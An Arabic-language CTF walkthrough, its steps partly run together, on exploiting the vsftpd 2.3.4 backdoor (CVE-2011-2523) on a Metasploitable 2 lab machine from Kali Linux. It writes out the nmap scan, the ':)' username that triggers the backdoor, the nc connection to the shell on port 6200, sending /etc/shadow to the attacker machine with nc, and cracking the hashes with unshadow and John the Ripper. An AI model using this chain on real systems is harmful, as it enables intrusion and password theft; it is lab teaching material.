
شرح خطوة بخطوة لـ CTF يستغل الباب الخلفي vsftpd 2.3.4 (CVE-2011-2523) لالتقاط وكسر /etc/shadow و /etc/passwd من Metasploitable 2.
استحوذ على الملفين المُفكَّكين /etc/shadow و /etc/passwd من خادم Metasploitable 2 الضعيف.
لهذه المسابقة، نشغل VMware Workstation Pro مع جهازين افتراضيين. نستخدم Kali Linux كجهاز المهاجم و Metasploitable 2 كجهاز ضعيف.
Open a Virtual Machine في VMware Workstation وحدد ملف Kali Linux المفكوكopen، ثم حدد ملف Metasploitable 2 المفكوكPlay virtual machine في كلا الجهازينI moved It أو I copied It، اختر I copied Itkali كاسم المستخدم وكلمة المرورmsfadmin كاسم المستخدم وكلمة المرورip addr show وسجّل عنوان IP من قسم inetتفصّل أبحاث وهندسة معهد ماساتشوستس للتكنولوجيا CVE-2011-2523 كضعف ونقطة تعرض شائعة حيث يحتوي vsftpd 2.3.4 الذي تم تنزيله بين 20110630 و 20110703 على باب خلفي يفتح شل على المنفذ 6200/tcp.
nmap <vulnerable-machine-ip-address>nc <vulnerable-machine-ip-address> 21:)، أدخل user <string>:)pass <string>nc -v <vulnerable-machine-ip-address> 6200ip addr showwhoami/etc/shadow و /etc/passwd إلى ملف آخرcp /etc/shadow shadow.txtcp /etc/passwd passwd.txtinet باستخدام الأمر ip addr shownc -l -p 1234 > shadow.txt على جهاز المهاجمnc -w 3 <destination-ip> 1234 < shadow.txtJohnunshadow passwd.txt shadow.txt > unshadowed-inputcat unshadowed-input، يجب أن يحتوي على اسم المستخدم وكلمة المرور مخزّنينJohn وقائمة الكلماتrockyou.txt لتفجير التجزئات باستخدام johnsudo gzip -d /usr/share/wordlists/rockyou.txt.gzkalijohn unshadowed-input --wordlist=/usr/share/wordlists/rockyou.txtjohn --show unshadowed-input